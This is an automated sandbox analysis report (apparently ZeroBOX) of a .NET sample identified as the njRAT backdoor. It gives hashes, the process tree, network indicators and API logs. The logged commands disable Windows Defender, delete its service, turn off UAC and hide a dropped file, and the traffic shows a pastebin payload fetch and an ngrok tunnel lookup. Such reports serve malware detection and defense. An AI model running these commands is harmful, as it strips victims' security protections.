Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 3, 2024, 7:19 a.m.	April 3, 2024, 7:39 a.m.

Size	197.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`20d4f344fa2a4ad4cb48d90abfbab41f`
SHA256	`8c3b889f84864da05897622f9e90a1a860d9587296ae37daba5bf0394a5283fe`
CRC32	`13D2C742`
ssdeep	`3072:p/W1v3s+XvNby4I81B3pmL49sO13ENzB6dZ4ydThn6Yb4reE8xdoY92XF:p/uxXHZhswENB6k8v4rv87r921`
Yara	PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description) Win_Backdoor_njRAT_Zero - Win Backdoor njRAT

njhor.exe "C:\Users\test22\AppData\Local\Temp\njhor.exe"
2552
attrib.exe attrib +h "C:\Users\test22\AppData\Local\Temp\dllhost.exe"
2816
cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2876
- powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2936
cmd.exe cmd /c sc query windefend
3040
- sc.exe sc query windefend
  1152
cmd.exe cmd /c sc stop windefend
1728
- sc.exe sc stop windefend
  152
cmd.exe cmd /c sc delete windefend
2228
- sc.exe sc delete windefend
  2316
cmd.exe cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2444
- reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2568

Name	Response	Post-Analysis Lookup
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	172.67.34.170
5.tcp.eu.ngrok.io	A 3.127.181.115 A 3.67.62.142	3.67.112.102

IP Address	Status	Action
104.20.67.143	Active	Moloch
164.124.101.2	Active	Moloch
3.127.181.115	Active	Moloch
3.67.62.142	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49175 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2022642	ET INFO DNS Query to a *.ngrok domain (ngrok.io)	Misc activity
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2022642	ET INFO DNS Query to a *.ngrok domain (ngrok.io)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49175 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c7:af:cc:81:4d:27:d1:4c:7c:f4:bf:5d:55:9d:80:50:3b:6f:6c:cd

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2024, 7:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2024, 7:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2024, 7:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2024, 7:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2024, 7:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2024, 7:19 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2024, 7:19 a.m.			0	0
IsDebuggerPresent April 3, 2024, 7:19 a.m.			0	0

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: + Set-MpPreference <<<< -DisableRealtimeMonitoring $true console_handle: 0x00000053	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: SERVICE_NAME: windefend TYPE : 20 WIN32_SHARE_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 1077 (0x435) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: [SC] ControlService FAILED 1062: The service has not been started. console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: [SC] DeleteService SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 7:19 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004121c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004122c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 7:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004126c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 3, 2024, 7:19 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://pastebin.com/raw/g96Z0CYj

Performs some HTTP requests (1 event)

request

GET https://pastebin.com/raw/g96Z0CYj

Allocates read-write-execute memory (usually to unpack itself) (50 out of 169 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00890000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00472000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00483000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00484000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04521000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04527000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0452a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0452b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0452e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00496000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0452f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00489000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2552 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02227000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02212000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02225000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2024, 7:19 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

